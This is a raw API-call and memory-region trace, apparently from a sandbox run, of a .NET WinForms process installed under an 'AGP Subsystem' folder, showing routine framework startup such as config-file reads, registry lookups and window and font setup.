filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")
Region:
id = 3171
start_va = 0x280000
end_va = 0x280fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000280000"
filename = ""
Region:
id = 3172
start_va = 0x6f890000
end_va = 0x6fcabfff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "windowsbase.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\WindowsBase\\1a4cc316fb6d09525321fc0be44692d8\\WindowsBase.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\windowsbase\\1a4cc316fb6d09525321fc0be44692d8\\windowsbase.ni.dll")
Region:
id = 3173
start_va = 0x6ec50000
end_va = 0x6f88bfff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "presentationcore.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\PresentationCore\\468f4e17be144ca12a73a4297eacc9cc\\PresentationCore.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\presentationcore\\468f4e17be144ca12a73a4297eacc9cc\\presentationcore.ni.dll")
Region:
id = 3174
start_va = 0x6d860000
end_va = 0x6ec42fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "presentationframework.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Presentatio5ae0f00f#\\252cc7b0fae8cfe083bdc149957c0c54\\PresentationFramework.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\presentatio5ae0f00f#\\252cc7b0fae8cfe083bdc149957c0c54\\presentationframework.ni.dll")
Region:
id = 3175
start_va = 0xbb0000
end_va = 0xc11fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "mscorrc.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscorrc.dll")
Region:
id = 3176
start_va = 0x470000
end_va = 0x47ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000470000"
filename = ""
Region:
id = 3177
start_va = 0x4c0000
end_va = 0x4cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004c0000"
filename = ""
Region:
id = 3178
start_va = 0x4d0000
end_va = 0x4dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004d0000"
filename = ""
Region:
id = 3179
start_va = 0x4f0000
end_va = 0x4fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004f0000"
filename = ""
Region:
id = 3180
start_va = 0x4d0000
end_va = 0x4dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004d0000"
filename = ""
Region:
id = 3181
start_va = 0x4f0000
end_va = 0x4fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004f0000"
filename = ""
Region:
id = 3182
start_va = 0x500000
end_va = 0x50ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000500000"
filename = ""
Region:
id = 3183
start_va = 0x4d0000
end_va = 0x4dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004d0000"
filename = ""
Region:
id = 3184
start_va = 0x4dd0000
end_va = 0x4e0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004dd0000"
filename = ""
Region:
id = 3185
start_va = 0x5ba0000
end_va = 0x5c9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005ba0000"
filename = ""
Region:
id = 3186
start_va = 0x7efa7000
end_va = 0x7efa9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efa7000"
filename = ""
Region:
id = 3187
start_va = 0x5ca0000
end_va = 0x6c9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005ca0000"
filename = ""
Region:
id = 3188
start_va = 0x6ca0000
end_va = 0x6deffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006ca0000"
filename = ""
Region:
id = 3189
start_va = 0x6df0000
end_va = 0x7deffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006df0000"
filename = ""
Region:
id = 3190
start_va = 0x7df0000
end_va = 0x808ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007df0000"
filename = ""
Region:
id = 3191
start_va = 0x4d0000
end_va = 0x4dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004d0000"
filename = ""
Region:
id = 3192
start_va = 0x4d0000
end_va = 0x4dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004d0000"
filename = ""
Region:
id = 3323
start_va = 0x80a0000
end_va = 0x80dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000080a0000"
filename = ""
Region:
id = 3324
start_va = 0x81a0000
end_va = 0x829ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000081a0000"
filename = ""
Region:
id = 3325
start_va = 0x7efa4000
end_va = 0x7efa6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efa4000"
filename = ""
Thread:
id = 87
os_tid = 0x730
[0262.212] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0
[0266.835] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\AppContext", ulOptions=0x0, samDesired=0x20019, phkResult=0x38e800 | out: phkResult=0x38e800*=0x0) returned 0x2
[0266.835] RegCloseKey (hKey=0x80000002) returned 0x0
[0266.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", nBufferLength=0x105, lpBuffer=0x38ea84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", lpFilePart=0x0) returned 0x77
[0266.901] IsAppThemed () returned 0x1
[0266.911] CoTaskMemAlloc (cb=0xf0) returned 0x7693e8
[0266.912] CreateActCtxA (pActCtx=0x38efa8) returned 0x76de0c
[0267.043] CoTaskMemFree (pv=0x7693e8)
[0267.085] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc104
[0267.085] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc105
[0267.739] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe.config", nBufferLength=0x105, lpBuffer=0x38e900, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe.config", lpFilePart=0x0) returned 0x35
[0268.065] GetCurrentProcess () returned 0xffffffff
[0268.066] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x38ec38 | out: TokenHandle=0x38ec38*=0x1f0) returned 1
[0268.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x38e6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e
[0268.124] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x38ec30 | out: lpFileInformation=0x38ec30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63fb400, ftCreationTime.dwHighDateTime=0x1d4e4ee, ftLastAccessTime.dwLowDateTime=0xb9f350b0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xc63fb400, ftLastWriteTime.dwHighDateTime=0x1d4e4ee, nFileSizeHigh=0x0, nFileSizeLow=0x8c8e)) returned 1
[0268.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x38e6bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43
[0268.126] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x38ec38 | out: lpFileInformation=0x38ec38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63fb400, ftCreationTime.dwHighDateTime=0x1d4e4ee, ftLastAccessTime.dwLowDateTime=0xb9f350b0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xc63fb400, ftLastWriteTime.dwHighDateTime=0x1d4e4ee, nFileSizeHigh=0x0, nFileSizeLow=0x8c8e)) returned 1
[0268.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x38e658, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43
[0268.131] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38eb70) returned 1
[0268.132] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x40
[0268.133] GetFileType (hFile=0x40) returned 0x1
[0268.133] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eb6c) returned 1
[0268.133] GetFileType (hFile=0x40) returned 0x1
[0268.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x38dea8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x43
[0268.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x38df0c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x43
[0268.458] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38e14c) returned 1
[0268.458] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x38e410 | out: lpFileInformation=0x38e410*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63fb400, ftCreationTime.dwHighDateTime=0x1d4e4ee, ftLastAccessTime.dwLowDateTime=0xb9f350b0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xc63fb400, ftLastWriteTime.dwHighDateTime=0x1d4e4ee, nFileSizeHigh=0x0, nFileSizeLow=0x8c8e)) returned 1
[0268.458] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38e148) returned 1
[0268.667] BCryptGetFipsAlgorithmMode (in: pfEnabled=0x38e2dc | out: pfEnabled=0x38e2dc) returned 0x0
[0268.774] GetFileSize (in: hFile=0x40, lpFileSizeHigh=0x38ec2c | out: lpFileSizeHigh=0x38ec2c*=0x0) returned 0x8c8e
[0268.776] ReadFile (in: hFile=0x40, lpBuffer=0x23dffac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38ebe8, lpOverlapped=0x0 | out: lpBuffer=0x23dffac*, lpNumberOfBytesRead=0x38ebe8*=0x1000, lpOverlapped=0x0) returned 1
[0268.804] ReadFile (in: hFile=0x40, lpBuffer=0x23dffac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38ea98, lpOverlapped=0x0 | out: lpBuffer=0x23dffac*, lpNumberOfBytesRead=0x38ea98*=0x1000, lpOverlapped=0x0) returned 1
[0268.806] ReadFile (in: hFile=0x40, lpBuffer=0x23dffac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38e94c, lpOverlapped=0x0 | out: lpBuffer=0x23dffac*, lpNumberOfBytesRead=0x38e94c*=0x1000, lpOverlapped=0x0) returned 1
[0268.807] ReadFile (in: hFile=0x40, lpBuffer=0x23dffac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38e94c, lpOverlapped=0x0 | out: lpBuffer=0x23dffac*, lpNumberOfBytesRead=0x38e94c*=0x1000, lpOverlapped=0x0) returned 1
[0268.808] ReadFile (in: hFile=0x40, lpBuffer=0x23dffac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38e94c, lpOverlapped=0x0 | out: lpBuffer=0x23dffac*, lpNumberOfBytesRead=0x38e94c*=0x1000, lpOverlapped=0x0) returned 1
[0268.808] ReadFile (in: hFile=0x40, lpBuffer=0x23dffac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38e884, lpOverlapped=0x0 | out: lpBuffer=0x23dffac*, lpNumberOfBytesRead=0x38e884*=0x1000, lpOverlapped=0x0) returned 1
[0268.817] ReadFile (in: hFile=0x40, lpBuffer=0x23dffac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38e9f0, lpOverlapped=0x0 | out: lpBuffer=0x23dffac*, lpNumberOfBytesRead=0x38e9f0*=0x1000, lpOverlapped=0x0) returned 1
[0268.819] ReadFile (in: hFile=0x40, lpBuffer=0x23dffac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38e8e4, lpOverlapped=0x0 | out: lpBuffer=0x23dffac*, lpNumberOfBytesRead=0x38e8e4*=0x1000, lpOverlapped=0x0) returned 1
[0268.820] ReadFile (in: hFile=0x40, lpBuffer=0x23dffac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38e8e4, lpOverlapped=0x0 | out: lpBuffer=0x23dffac*, lpNumberOfBytesRead=0x38e8e4*=0xc8e, lpOverlapped=0x0) returned 1
[0268.820] ReadFile (in: hFile=0x40, lpBuffer=0x23dffac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38e9a8, lpOverlapped=0x0 | out: lpBuffer=0x23dffac*, lpNumberOfBytesRead=0x38e9a8*=0x0, lpOverlapped=0x0) returned 1
[0268.820] CloseHandle (hObject=0x40) returned 1
[0268.821] CloseHandle (hObject=0x1f0) returned 1
[0268.822] GetCurrentProcess () returned 0xffffffff
[0268.822] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x38ed84 | out: TokenHandle=0x38ed84*=0x1f0) returned 1
[0268.823] CloseHandle (hObject=0x1f0) returned 1
[0268.824] GetCurrentProcess () returned 0xffffffff
[0268.824] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x38ed84 | out: TokenHandle=0x38ed84*=0x1f0) returned 1
[0268.825] CloseHandle (hObject=0x1f0) returned 1
[0268.838] GetCurrentProcess () returned 0xffffffff
[0268.839] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x38ec38 | out: TokenHandle=0x38ec38*=0x1f0) returned 1
[0268.839] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe.config" (normalized: "c:\\program files (x86)\\agp subsystem\\agpss.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x38ec30 | out: lpFileInformation=0x38ec30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0268.840] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe.config", nBufferLength=0x105, lpBuffer=0x38e6bc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe.config", lpFilePart=0x0) returned 0x35
[0268.840] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe.config" (normalized: "c:\\program files (x86)\\agp subsystem\\agpss.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x38ec38 | out: lpFileInformation=0x38ec38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0268.841] CloseHandle (hObject=0x1f0) returned 1
[0268.841] GetCurrentProcess () returned 0xffffffff
[0268.841] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x38ed84 | out: TokenHandle=0x38ed84*=0x1f0) returned 1
[0268.842] CloseHandle (hObject=0x1f0) returned 1
[0268.844] GetCurrentProcess () returned 0xffffffff
[0268.844] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x38ed84 | out: TokenHandle=0x38ed84*=0x1f0) returned 1
[0268.845] CloseHandle (hObject=0x1f0) returned 1
[0268.868] GetCurrentProcess () returned 0xffffffff
[0268.868] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x38eb9c | out: TokenHandle=0x38eb9c*=0x1f0) returned 1
[0268.887] CloseHandle (hObject=0x1f0) returned 1
[0268.887] GetCurrentProcess () returned 0xffffffff
[0268.888] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x38ebb4 | out: TokenHandle=0x38ebb4*=0x1f0) returned 1
[0268.898] CloseHandle (hObject=0x1f0) returned 1
[0268.904] GetSystemMetrics (nIndex=75) returned 1
[0268.911] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0
[0268.923] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b80000
[0268.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AddDllDirectory", cchWideChar=15, lpMultiByteStr=0x38ee80, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AddDllDirectory", lpUsedDefaultChar=0x0) returned 15
[0268.926] GetProcAddress (hModule=0x76b80000, lpProcName="AddDllDirectory") returned 0x75171e91
[0268.927] LoadLibraryExW (lpLibFileName="comctl32.dll", hFile=0x0, dwFlags=0x800) returned 0x74170000
[0268.958] AdjustWindowRectEx (in: lpRect=0x38efe8, dwStyle=0x56cf0000, bMenu=0, dwExStyle=0x50001 | out: lpRect=0x38efe8) returned 1
[0268.964] GetCurrentProcess () returned 0xffffffff
[0268.964] GetCurrentThread () returned 0xfffffffe
[0268.964] GetCurrentProcess () returned 0xffffffff
[0268.964] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x38ef00, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x38ef00*=0x40) returned 1
[0268.967] GetCurrentThreadId () returned 0x730
[0268.983] GetCurrentActCtx (in: lphActCtx=0x38ee60 | out: lphActCtx=0x38ee60*=0x0) returned 1
[0268.984] ActivateActCtx (in: hActCtx=0x76de0c, lpCookie=0x38ee70 | out: hActCtx=0x76de0c, lpCookie=0x38ee70) returned 1
[0268.986] GetModuleHandleW (lpModuleName="user32.dll") returned 0x76c90000
[0268.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="DefWindowProcW", cchWideChar=14, lpMultiByteStr=0x38ed18, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefWindowProcWçp×NêHDþ\x80tôñ8", lpUsedDefaultChar=0x0) returned 14
[0268.987] GetProcAddress (hModule=0x76c90000, lpProcName="DefWindowProcW") returned 0x774c25dd
[0268.987] GetStockObject (i=5) returned 0x1900015
[0268.991] GetModuleHandleW (lpModuleName=0x0) returned 0xee0000
[0268.995] CoTaskMemAlloc (cb=0x5c) returned 0x76e6f8
[0268.995] RegisterClassW (lpWndClass=0x38ed08) returned 0xc107
[0268.996] CoTaskMemFree (pv=0x76e6f8)
[0268.996] GetModuleHandleW (lpModuleName=0x0) returned 0xee0000
[0268.996] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.8.app.0.141b42a_r14_ad1", lpWindowName=0x0, dwStyle=0x2010000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0xfffffffd, hMenu=0x0, hInstance=0xee0000, lpParam=0x0) returned 0x20150
[0268.997] SetWindowLongW (hWnd=0x20150, nIndex=-4, dwNewLong=2001479133) returned 77531350
[0268.998] GetWindowLongW (hWnd=0x20150, nIndex=-4) returned 2001479133
[0269.005] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x38e61c | out: phkResult=0x38e61c*=0x230) returned 0x0
[0269.007] RegQueryValueExW (in: hKey=0x230, lpValueName="DbgJITDebugLaunchSetting", lpReserved=0x0, lpType=0x38e63c, lpData=0x0, lpcbData=0x38e638*=0x0 | out: lpType=0x38e63c*=0x0, lpData=0x0, lpcbData=0x38e638*=0x0) returned 0x2
[0269.007] RegQueryValueExW (in: hKey=0x230, lpValueName="DbgManagedDebugger", lpReserved=0x0, lpType=0x38e63c, lpData=0x0, lpcbData=0x38e638*=0x0 | out: lpType=0x38e63c*=0x0, lpData=0x0, lpcbData=0x38e638*=0x0) returned 0x2
[0269.007] RegCloseKey (hKey=0x230) returned 0x0
[0269.010] SetWindowLongW (hWnd=0x20150, nIndex=-4, dwNewLong=77531390) returned 2001479133
[0269.010] GetWindowLongW (hWnd=0x20150, nIndex=-4) returned 77531390
[0269.010] GetWindowLongW (hWnd=0x20150, nIndex=-16) returned 113311744
[0269.011] RegisterClipboardFormatW (lpszFormat="WinFormsMouseEnter") returned 0xc108
[0269.012] CallWindowProcW (lpPrevWndFunc=0x774c25dd, hWnd=0x20150, Msg=0x24, wParam=0x0, lParam=0x38e8f4) returned 0x0
[0269.012] RegisterClipboardFormatW (lpszFormat="WinFormsUnSubclass") returned 0xc109
[0269.012] CallWindowProcW (lpPrevWndFunc=0x774c25dd, hWnd=0x20150, Msg=0x81, wParam=0x0, lParam=0x38e8e8) returned 0x1
[0269.013] CallWindowProcW (lpPrevWndFunc=0x774c25dd, hWnd=0x20150, Msg=0x83, wParam=0x0, lParam=0x38e8d4) returned 0x0
[0269.013] CallWindowProcW (lpPrevWndFunc=0x774c25dd, hWnd=0x20150, Msg=0x1, wParam=0x0, lParam=0x38e8e8) returned 0x0
[0269.013] GetClientRect (in: hWnd=0x20150, lpRect=0x38e650 | out: lpRect=0x38e650) returned 1
[0269.013] GetWindowRect (in: hWnd=0x20150, lpRect=0x38e650 | out: lpRect=0x38e650) returned 1
[0269.015] GetParent (hWnd=0x20150) returned 0x0
[0269.015] DeactivateActCtx (dwFlags=0x0, ulCookie=0x16260001) returned 1
[0269.149] AdjustWindowRectEx (in: lpRect=0x38ed98, dwStyle=0x56010000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x38ed98) returned 1
[0269.152] AdjustWindowRectEx (in: lpRect=0x38eda8, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38eda8) returned 1
[0269.153] AdjustWindowRectEx (in: lpRect=0x38eda8, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38eda8) returned 1
[0269.154] AdjustWindowRectEx (in: lpRect=0x38eda8, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38eda8) returned 1
[0269.155] AdjustWindowRectEx (in: lpRect=0x38eda8, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38eda8) returned 1
[0269.156] AdjustWindowRectEx (in: lpRect=0x38eda8, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38eda8) returned 1
[0269.157] AdjustWindowRectEx (in: lpRect=0x38ed98, dwStyle=0x56010000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x38ed98) returned 1
[0269.171] AdjustWindowRectEx (in: lpRect=0x38edac, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38edac) returned 1
[0269.172] AdjustWindowRectEx (in: lpRect=0x38edac, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38edac) returned 1
[0269.173] AdjustWindowRectEx (in: lpRect=0x38ed98, dwStyle=0x56010000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x38ed98) returned 1
[0269.179] GetCurrentThreadId () returned 0x730
[0269.179] GetCurrentThreadId () returned 0x730
[0269.184] GetSystemDefaultLCID () returned 0x409
[0269.184] GetStockObject (i=17) returned 0x18a0025
[0269.187] GetObjectW (in: h=0x18a0025, c=92, pv=0x38ebfc | out: pv=0x38ebfc) returned 92
[0269.188] GetDC (hWnd=0x0) returned 0x70101c6
[0269.233] GdiplusStartup (in: token=0x166018, input=0x38e1c0, output=0x38e210 | out: token=0x166018, output=0x38e210) returned 0x0
[0269.257] CoTaskMemAlloc (cb=0x5c) returned 0x76e6f8
[0269.258] GdipCreateFontFromLogfontW (hdc=0x70101c6, logfont=0x76e6f8, font=0x38ecc4) returned 0x0
[0269.471] CoTaskMemFree (pv=0x76e6f8)
[0269.473] CoTaskMemAlloc (cb=0x5c) returned 0x76e6f8
[0269.473] CoTaskMemFree (pv=0x76e6f8)
[0269.474] CoTaskMemAlloc (cb=0x5c) returned 0x76e6f8
[0269.474] CoTaskMemFree (pv=0x76e6f8)
[0269.475] GdipGetFontUnit (font=0x4e2230, unit=0x38ec8c) returned 0x0
[0269.475] GdipGetFontSize (font=0x4e2230, size=0x38ec90) returned 0x0
[0269.476] GdipGetFontStyle (font=0x4e2230, style=0x38ec88) returned 0x0
[0269.476] GdipGetFamily (font=0x4e2230, family=0x38ec84) returned 0x0
[0269.477] GdipGetFontSize (font=0x4e2230, size=0x23fdcd0) returned 0x0
[0269.478] ReleaseDC (hWnd=0x0, hDC=0x70101c6) returned 1
[0269.478] GetDC (hWnd=0x0) returned 0x70101c6
[0269.480] GdipCreateFromHDC (hdc=0x70101c6, graphics=0x38eca0) returned 0x0
[0269.482] GdipGetDpiY (graphics=0x49c9170, dpi=0x23fddac) returned 0x0
[0269.482] GdipGetFontHeight (font=0x4e2230, graphics=0x49c9170, height=0x38ec98) returned 0x0
[0269.483] GdipGetEmHeight (family=0x4ef358, style=0, EmHeight=0x38eca0) returned 0x0
[0269.483] GdipGetLineSpacing (family=0x4ef358, style=0, LineSpacing=0x38eca0) returned 0x0
[0269.484] GdipDeleteGraphics (graphics=0x49c9170) returned 0x0
[0269.484] ReleaseDC (hWnd=0x0, hDC=0x70101c6) returned 1
[0269.486] GdipCreateFont (fontFamily=0x4ef358, emSize=0x41040000, style=0, unit=0x3, font=0x23fddc8) returned 0x0
[0269.486] GdipGetFontSize (font=0x4940960, size=0x23fddcc) returned 0x0
[0269.486] GdipDeleteFont (font=0x4e2230) returned 0x0
[0269.491] GetCurrentThreadId () returned 0x730
[0269.491] GetCurrentThreadId () returned 0x730
[0269.491] GetCurrentThreadId () returned 0x730
[0269.492] GetCurrentThreadId () returned 0x730
[0269.492] GetCurrentThreadId () returned 0x730
[0269.492] GetCurrentThreadId () returned 0x730
[0269.492] GetCurrentThreadId () returned 0x730
[0269.492] GetCurrentThreadId () returned 0x730
[0269.493] AdjustWindowRectEx (in: lpRect=0x38ed38, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x38ed38) returned 1
[0269.502] GetProcessWindowStation () returned 0x60
[0269.511] GetUserObjectInformationA (in: hObj=0x60, nIndex=1, pvInfo=0x23fe680, nLength=0xc, lpnLengthNeeded=0x38ec14 | out: pvInfo=0x23fe680, lpnLengthNeeded=0x38ec14) returned 1
[0269.514] SetConsoleCtrlHandler (HandlerRoutine=0x49f0926, Add=1) returned 1
[0269.514] GetModuleHandleW (lpModuleName=0x0) returned 0xee0000
[0269.515] GetModuleHandleW (lpModuleName=0x0) returned 0xee0000
[0269.518] GetClassInfoW (in: hInstance=0xee0000, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.141b42a.0", lpWndClass=0x23fe6e4 | out: lpWndClass=0x23fe6e4) returned 0
[0269.521] CoTaskMemAlloc (cb=0x58) returned 0x78cdc0
[0269.521] RegisterClassW (lpWndClass=0x38eb64) returned 0xc10b
[0269.521] CoTaskMemFree (pv=0x78cdc0)
